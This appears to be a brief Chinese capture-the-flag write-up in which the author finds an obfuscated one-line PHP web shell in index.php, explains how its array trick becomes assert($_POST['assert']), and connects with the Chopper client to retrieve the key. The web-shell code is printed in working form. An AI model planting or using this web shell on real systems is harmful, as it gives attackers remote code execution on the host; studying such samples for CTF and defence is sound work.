下载文件,查看index.php
发现一句话木马
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
解释一下,这是一句话木马的变种
$array[],POST[]都是数组(表单域的名称会自动成为 $_POST 数组中的键),
所以array[]=array[]=POST,就是把POST数组的值赋给POST数组的值赋给array数组,
这样的话$array[0]['POST']的输出就是assert,所以组成了一句话木马
assert($_POST['assert'])
所以密码是assert
接下来是菜刀无惧链接
链接成功拿到key